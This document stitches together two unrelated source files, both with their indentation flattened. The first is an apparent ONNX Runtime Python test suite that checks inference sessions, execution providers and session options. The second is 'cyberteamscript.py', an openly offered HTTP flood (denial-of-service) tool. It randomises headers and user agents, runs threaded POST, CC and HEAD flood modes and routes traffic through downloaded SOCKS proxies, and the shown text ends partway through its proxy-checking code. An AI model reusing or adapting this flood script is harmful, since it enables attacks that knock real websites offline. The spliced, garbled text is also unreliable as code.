def runAdvancedTest():
num_device = getCudaDeviceCount()
if num_device < 0:
return
# Configure session to be ready to run on all available cuda devices
for i in range(num_device):
setDeviceIdTest(i)
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
# configuring the session with illegitimate option values should fail
with self.assertRaises(RuntimeError):
option = {'device_id': num_device}
sess.set_providers(['CUDAExecutionProvider'], [option])
option = {'device_id': 'non_legit_value'}
sess.set_providers(['CUDAExecutionProvider'], [option])
# configuring the session with an unrecognized option should have no effect
option = {'device_id': 0}
sess.set_providers(['CUDAExecutionProvider'], [option])
option = {'non_legit_option': num_device}
sess.set_providers(['CUDAExecutionProvider'], [option])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
libnames = ('libcuda.so', 'libcuda.dylib', 'cuda.dll')
for libname in libnames:
try:
cuda = ctypes.CDLL(libname)
runBaseTest1()
runBaseTest2()
runAdvancedTest()
except OSError:
continue
else:
break
else:
runBaseTest1()
runBaseTest2()
# raise OSError("could not load any of: " + ' '.join(libnames))
def testInvalidSetProviders(self):
with self.assertRaises(ValueError) as context:
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
sess.set_providers(['InvalidProvider'])
self.assertTrue(
'[\'InvalidProvider\'] does not contain a subset of available providers' in str(context.exception))
def testSessionProviders(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
# create session from scratch, but constrain it to only use the CPU.
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['CPUExecutionProvider'])
self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testRunModel(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModelFromBytes(self):
with open(get_name("mul_1.onnx"), "rb") as f:
content = f.read()
sess = onnxrt.InferenceSession(content)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2Contiguous(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"))
x = np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32)[:, [1, 0]]
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
xcontiguous = np.ascontiguousarray(x)
rescontiguous = sess.run([output_name], {input_name: xcontiguous})
np.testing.assert_allclose(output_expected, rescontiguous[0], rtol=1e-05, atol=1e-08)
def testRunModelMultipleThreads(self):
available_providers = onnxrt.get_available_providers()
# Skip this test for a "pure" DML onnxruntime python wheel. We keep this test enabled for instances where both DML and CUDA
# EPs are available (Windows GPU CI pipeline has this config) - this test will pass because CUDA has higher precendence than DML
# and the nodes are assigned to only the CUDA EP (which supports this test)
if ('DmlExecutionProvider' in available_providers and not 'CUDAExecutionProvider' in available_providers):
print("Skipping testRunModelMultipleThreads as the DML EP does not support calling Run() on different threads using the same session object ")
else:
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "MultiThreadsTest"
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
ro1 = onnxrt.RunOptions()
ro1.logid = "thread1"
t1 = threading.Thread(target=self.run_model, args=(sess, ro1))
ro2 = onnxrt.RunOptions()
ro2.logid = "thread2"
t2 = threading.Thread(target=self.run_model, args=(sess, ro2))
t1.start()
t2.start()
t1.join()
t2.join()
def testListAsInput(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
res = sess.run([], {input_name: x.tolist()})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testStringListAsInput(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], dtype=str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
res = sess.run([], {x_name: x.tolist()})
np.testing.assert_equal(x, res[0])
def testRunDevice(self):
device = onnxrt.get_device()
self.assertTrue('CPU' in device or 'GPU' in device)
def testRunModelSymbolicInput(self):
sess = onnxrt.InferenceSession(get_name("matmul_2.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
# Input X has an unknown dimension.
self.assertEqual(input_shape, ['None', 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
# Output Y has an unknown dimension.
self.assertEqual(output_shape, ['None', 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testBooleanInputs(self):
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"))
a = np.array([[True, True], [False, False]], dtype=bool)
b = np.array([[True, False], [True, False]], dtype=bool)
# input1:0 is first in the protobuf, and input:0 is second
# and we maintain the original order.
a_name = sess.get_inputs()[0].name
self.assertEqual(a_name, "input1:0")
a_shape = sess.get_inputs()[0].shape
self.assertEqual(a_shape, [2, 2])
a_type = sess.get_inputs()[0].type
self.assertEqual(a_type, 'tensor(bool)')
b_name = sess.get_inputs()[1].name
self.assertEqual(b_name, "input:0")
b_shape = sess.get_inputs()[1].shape
self.assertEqual(b_shape, [2, 2])
b_type = sess.get_inputs()[1].type
self.assertEqual(b_type, 'tensor(bool)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(bool)')
output_expected = np.array([[True, False], [False, False]], dtype=bool)
res = sess.run([output_name], {a_name: a, b_name: b})
np.testing.assert_equal(output_expected, res[0])
def testStringInput1(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], dtype=str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testStringInput2(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['Olá', '你好', '여보세요', 'hello'], dtype=str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputBytes(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array([b'this', b'is', b'identity', b'test']).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0].astype('|S8'))
def testInputObject(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], object).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputVoid(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array([b'this', b'is', b'identity', b'test'], np.void).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
expr = np.array([['this\x00\x00\x00\x00', 'is\x00\x00\x00\x00\x00\x00'], ['identity', 'test\x00\x00\x00\x00']],
dtype=object)
np.testing.assert_equal(expr, res[0])
def testRaiseWrongNumInputs(self):
with self.assertRaises(ValueError) as context:
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"))
a = np.array([[True, True], [False, False]], dtype=bool)
res = sess.run([], {'input:0': a})
self.assertTrue('Model requires 2 inputs' in str(context.exception))
def testModelMeta(self):
model_path = "../models/opset8/test_squeezenet/model.onnx"
if not os.path.exists(model_path):
return
sess = onnxrt.InferenceSession(model_path)
modelmeta = sess.get_modelmeta()
self.assertEqual('onnx-caffe2', modelmeta.producer_name)
self.assertEqual('squeezenet_old', modelmeta.graph_name)
self.assertEqual('', modelmeta.domain)
self.assertEqual('', modelmeta.description)
def testProfilerWithSessionOptions(self):
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
sess.run([], {'X': x})
profile_file = sess.end_profiling()
tags = ['pid', 'dur', 'ts', 'ph', 'X', 'name', 'args']
with open(profile_file) as f:
lines = f.readlines()
self.assertTrue('[' in lines[0])
for i in range(1, 8):
for tag in tags:
self.assertTrue(tag in lines[i])
self.assertTrue(']' in lines[8])
def testGraphOptimizationLevel(self):
opt = onnxrt.SessionOptions()
# default should be ORT_ENABLE_ALL (all optimizations)
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL)
opt.graph_optimization_level = onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED)
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"), sess_options=opt)
a = np.array([[True, True], [False, False]], dtype=bool)
b = np.array([[True, False], [True, False]], dtype=bool)
res = sess.run([], {'input1:0': a, 'input:0': b})
def testSequenceLength(self):
sess = onnxrt.InferenceSession(get_name("sequence_length.onnx"))
x = [
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)),
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3))
]
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "X")
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'seq(tensor(float))')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(int64)')
output_expected = np.array(2, dtype=np.int64)
res = sess.run([output_name], {x_name: x})
self.assertEqual(output_expected, res[0])
def testSequenceConstruct(self):
sess = onnxrt.InferenceSession(get_name("sequence_construct.onnx"))
self.assertEqual(sess.get_inputs()[0].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "tensor1")
self.assertEqual(sess.get_inputs()[1].name, "tensor2")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [
np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))
]
res = sess.run(
[output_name], {
"tensor1": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"tensor2": np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))
})
np.testing.assert_array_equal(output_expected, res[0])
def testSequenceInsert(self):
opt = onnxrt.SessionOptions()
opt.execution_mode = onnxrt.ExecutionMode.ORT_SEQUENTIAL
sess = onnxrt.InferenceSession(get_name("sequence_insert.onnx"), sess_options=opt)
self.assertEqual(sess.get_inputs()[0].type, 'seq(tensor(int64))')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "input_seq")
self.assertEqual(sess.get_inputs()[1].name, "tensor")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3))]
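# The sequence input is supplied as an empty Python list; the model inserts the tensor into it,
# so the expected output is a sequence containing that single tensor.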
res = sess.run([output_name], {
"tensor": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"input_seq": []
})
np.testing.assert_array_equal(output_expected, res[0])
def testOrtExecutionMode(self):
opt = onnxrt.SessionOptions()
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_SEQUENTIAL)
opt.execution_mode = onnxrt.ExecutionMode.ORT_PARALLEL
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_PARALLEL)
def testLoadingSessionOptionsFromModel(self):
try:
os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(1)
sess = onnxrt.InferenceSession(get_name("model_with_valid_ort_config_json.onnx"))
session_options = sess.get_session_options()
self.assertEqual(session_options.inter_op_num_threads, 5) # from the ORT config
self.assertEqual(session_options.intra_op_num_threads, 2) # from the ORT config
self.assertEqual(session_options.execution_mode,
onnxrt.ExecutionMode.ORT_SEQUENTIAL) # default option (not from the ORT config)
self.assertEqual(session_options.graph_optimization_level,
onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL) # from the ORT config
self.assertEqual(session_options.enable_profiling, True) # from the ORT config
except Exception:
raise
finally:
# Make sure the usage of the feature is disabled after this test
os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(0)
def testSessionOptionsAddFreeDimensionOverrideByDenotation(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_denotation("DATA_BATCH", 3)
so.add_free_dimension_override_by_denotation("DATA_CHANNEL", 5)
sess = onnxrt.InferenceSession(get_name("abs_free_dimensions.onnx"), so)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# Free dims with denotations - "DATA_BATCH" and "DATA_CHANNEL" have values assigned to them.
self.assertEqual(input_shape, [3, 5, 5])
def testSessionOptionsAddFreeDimensionOverrideByName(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_name("Dim1", 4)
so.add_free_dimension_override_by_name("Dim2", 6)
sess = onnxrt.InferenceSession(get_name("abs_free_dimensions.onnx"), so)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# "Dim1" and "Dim2" have values assigned to them.
self.assertEqual(input_shape, [4, 6, 5])
def testSessionOptionsAddConfigEntry(self):
so = onnxrt.SessionOptions()
key = "CONFIG_KEY"
val = "CONFIG_VAL"
so.add_session_config_entry(key, val)
self.assertEqual(so.get_session_config_entry(key), val)
def testInvalidSessionOptionsConfigEntry(self):
so = onnxrt.SessionOptions()
invalid_key = "INVALID_KEY"
with self.assertRaises(RuntimeError) as context:
so.get_session_config_entry(invalid_key)
self.assertTrue(
'SessionOptions does not have configuration with key: ' + invalid_key in str(context.exception))
def testRegisterCustomOpsLibrary(self):
if sys.platform.startswith("win"):
shared_library = 'custom_op_library.dll'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
elif sys.platform.startswith("darwin"):
shared_library = 'libcustom_op_library.dylib'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
else:
shared_library = './libcustom_op_library.so'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
this = os.path.dirname(__file__)
custom_op_model = os.path.join(this, "testdata", "custom_op_library", "custom_op_test.onnx")
if not os.path.exists(custom_op_model):
raise FileNotFoundError("Unable to find '{0}'".format(custom_op_model))
so1 = onnxrt.SessionOptions()
so1.register_custom_ops_library(shared_library)
# Model loading successfully indicates that the custom op node could be resolved successfully
sess1 = onnxrt.InferenceSession(custom_op_model, so1)
# Run with input data
input_name_0 = sess1.get_inputs()[0].name
input_name_1 = sess1.get_inputs()[1].name
output_name = sess1.get_outputs()[0].name
input_0 = np.ones((3,5)).astype(np.float32)
input_1 = np.zeros((3,5)).astype(np.float32)
res = sess1.run([output_name], {input_name_0: input_0, input_name_1: input_1})
output_expected = np.ones((3,5)).astype(np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
# Create an alias of SessionOptions instance
# We will use this alias to construct another InferenceSession
so2 = so1
# Model loading successfully indicates that the custom op node could be resolved successfully
sess2 = onnxrt.InferenceSession(custom_op_model, so2)
# Create another SessionOptions instance with the same shared library referenced
so3 = onnxrt.SessionOptions()
so3.register_custom_ops_library(shared_library)
sess3 = onnxrt.InferenceSession(custom_op_model, so3)
if __name__ == '__main__':
unittest.main()
|
cyberteamscript.py
|
#!/usr/bin/python3
#Coded by Vesah
#########################################
# Fist Version private script #
# Vesah lover
# #
#########################################
import requests
import socket
import socks
import time
import random
import threading
import sys
import ssl
import datetime
print ('''
. =======
/ \| O O |
\ / \`___'/
# _| |_
(#) ( )
#\//|* *|\\
#\/( * )/
# =====
# ( U )
# || ||
.#---'| |`----.
`#----' `-----'
>--------------------------------------------->
Version 1.0.0
Dev by Vesah
┌─────────────────────────────────────────────┐
│ Tos: N'attaque pas les .gov websites │
├─────────────────────────────────────────────┤
│ Amélioration : │
│ [+] Optimization │
│ [+] Changed Output │
│ [+] Added Url Parser │
├─────────────────────────────────────────────┤
│ By Vesah │ CyberTeam |
└─────────────────────────────────────────────┘''')
acceptall = [
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept-Encoding: gzip, deflate\r\n",
"Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n",
"Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n",
"Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n,"
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xhtml+xml",
"Accept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n",
"Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",]
referers = [
"https://www.google.com/search?q=",
"https://check-host.net/",
"https://www.facebook.com/",
"https://www.youtube.com/",
"https://www.fbi.com/",
"https://www.bing.com/search?q=",
"https://r.search.yahoo.com/",
"https://www.cia.gov/index.html",
"https://vk.com/profile.php?redirect=",
"https://www.usatoday.com/search/results?q=",
"https://help.baidu.com/searchResult?keywords=",
"https://steamcommunity.com/market/search?q=",
"https://www.ted.com/search?q=",
"https://play.google.com/store/search?q=",
"https://www.qwant.com/search?q=",
"https://soda.demo.socrata.com/resource/4tka-6guv.json?$q=",
"https://www.google.ad/search?q=",
"https://www.google.ae/search?q=",
"https://www.google.com.af/search?q=",
"https://www.google.com.ag/search?q=",
"https://www.google.com.ai/search?q=",
"https://www.google.al/search?q=",
"https://www.google.am/search?q=",
"https://www.google.co.ao/search?q=",
]
ind_dict = {}
data = ""
cookies = ""
strings = "asdfghjklqwertyuiopZXCVBNMQWERTYUIOPASDFGHJKLzxcvbnm1234567890&"
###################################################
Intn = random.randint
Choice = random.choice
###################################################
def build_threads(mode,thread_num,event,socks_type,ind_rlock):
if mode == "post":
for _ in range(thread_num):
th = threading.Thread(target = post,args=(event,socks_type,ind_rlock,))
th.setDaemon(True)
th.start()
elif mode == "cc":
for _ in range(thread_num):
th = threading.Thread(target = cc,args=(event,socks_type,ind_rlock,))
th.setDaemon(True)
th.start()
elif mode == "head":
for _ in range(thread_num):
th = threading.Thread(target = head,args=(event,socks_type,ind_rlock,))
th.setDaemon(True)
th.start()
def getuseragent():
platform = Choice(['Macintosh', 'Windows', 'X11'])
if platform == 'Macintosh':
os = Choice(['68K', 'PPC', 'Intel Mac OS X'])
elif platform == 'Windows':
os = Choice(['Win3.11', 'WinNT3.51', 'WinNT4.0', 'Windows NT 5.0', 'Windows NT 5.1', 'Windows NT 5.2', 'Windows NT 6.0', 'Windows NT 6.1', 'Windows NT 6.2', 'Win 9x 4.90', 'WindowsCE', 'Windows XP', 'Windows 7', 'Windows 8', 'Windows NT 10.0; Win64; x64'])
elif platform == 'X11':
os = Choice(['Linux i686', 'Linux x86_64'])
browser = Choice(['chrome', 'firefox', 'ie'])
if browser == 'chrome':
webkit = str(Intn(500, 599))
version = str(Intn(0, 99)) + '.0' + str(Intn(0, 9999)) + '.' + str(Intn(0, 999))
return 'Mozilla/5.0 (' + os + ') AppleWebKit/' + webkit + '.0 (KHTML, like Gecko) Chrome/' + version + ' Safari/' + webkit
elif browser == 'firefox':
currentYear = datetime.date.today().year
year = str(Intn(2020, currentYear))
month = Intn(1, 12)
if month < 10:
month = '0' + str(month)
else:
month = str(month)
day = Intn(1, 30)
if day < 10:
day = '0' + str(day)
else:
day = str(day)
gecko = year + month + day
version = str(Intn(1, 72)) + '.0'
return 'Mozilla/5.0 (' + os + '; rv:' + version + ') Gecko/' + gecko + ' Firefox/' + version
elif browser == 'ie':
version = str(Intn(1, 99)) + '.0'
engine = str(Intn(1, 99)) + '.0'
option = Choice([True, False])
if option == True:
token = Choice(['.NET CLR', 'SV1', 'Tablet PC', 'Win64; IA64', 'Win64; x64', 'WOW64']) + '; '
else:
token = ''
return 'Mozilla/5.0 (compatible; MSIE ' + version + '; ' + os + '; ' + token + 'Trident/' + engine + ')'
def randomurl():
return str(Choice(strings)+str(Intn(0,271400281257))+Choice(strings)+str(Intn(0,271004281257))+Choice(strings) + Choice(strings)+str(Intn(0,271400281257))+Choice(strings)+str(Intn(0,271004281257))+Choice(strings))
def GenReqHeader(method):
header = ""
if method == "get" or method == "head":
connection = "Connection: Keep-Alive\r\n"
if cookies != "":
connection += "Cookies: "+str(cookies)+"\r\n"
accept = Choice(acceptall)
referer = "Referer: "+Choice(referers)+ target + path + "\r\n"
useragent = "User-Agent: " + getuseragent() + "\r\n"
header = referer + useragent + accept + connection + "\r\n"
elif method == "post":
post_host = "POST " + path + " HTTP/1.1\r\nHost: " + target + "\r\n"
content = "Content-Type: application/x-www-form-urlencoded\r\nX-requested-with:XMLHttpRequest\r\n"
refer = "Referer: http://"+ target + path + "\r\n"
user_agent = "User-Agent: " + getuseragent() + "\r\n"
accept = Choice(acceptall)
if mode2 != "y":# You can enable customize data
data = str(random._urandom(16))
length = "Content-Length: "+str(len(data))+" \r\nConnection: Keep-Alive\r\n"
if cookies != "":
length += "Cookies: "+str(cookies)+"\r\n"
header = post_host + accept + refer + content + user_agent + length + "\n" + data + "\r\n\r\n"
return header
def ParseUrl(original_url):
global target
global path
global port
global protocol
original_url = original_url.strip()
url = ""
path = "/"#default value
port = 80 #default value
protocol = "http"
#http(s)://www.example.com:1337/xxx
if original_url[:7] == "http://":
url = original_url[7:]
elif original_url[:8] == "https://":
url = original_url[8:]
protocol = "https"
#http(s)://www.example.com:1337/xxx ==> www.example.com:1337/xxx
#print(url) #for debug
tmp = url.split("/")
website = tmp[0]#www.example.com:1337/xxx ==> www.example.com:1337
check = website.split(":")
if len(check) != 1:#detect the port
port = int(check[1])
else:
if protocol == "https":
port = 443
target = check[0]
if len(tmp) > 1:
path = url.replace(website,"",1)#get the path www.example.com/xxx ==> /xxx
def InputOption(question,options,default):
ans = ""
while ans == "":
ans = str(input(question)).strip().lower()
if ans == "":
ans = default
elif ans not in options:
print("> Please enter the correct option")
ans = ""
continue
return ans
def CheckerOption():
global proxies
N = str(input("> Do you need to get socks list?(y/n,default=y):"))
if N == 'y' or N == "" :
downloadsocks(choice)
else:
pass
if choice == "4":
out_file = str(input("> Socks4 Proxy file path(socks4.txt):"))
if out_file == '':
out_file = str("socks4.txt")
else:
out_file = str(out_file)
check_list(out_file)
proxies = open(out_file).readlines()
elif choice == "5":
out_file = str(input("> Socks5 Proxy file path(socks5.txt):"))
if out_file == '':
out_file = str("socks5.txt")
else:
out_file = str(out_file)
check_list(out_file)
proxies = open(out_file).readlines()
print ("> Number Of Socks%s Proxies: %s" %(choice,len(proxies)))
time.sleep(0.03)
ans = str(input("> Do u need to check the socks list?(y/n, defualt=y):"))
if ans == "":
ans = "y"
if ans == "y":
ms = str(input("> Delay of socks(seconds, default=1):"))
if ms == "":
ms = int(1)
else :
try:
ms = int(ms)
except :
ms = float(ms)
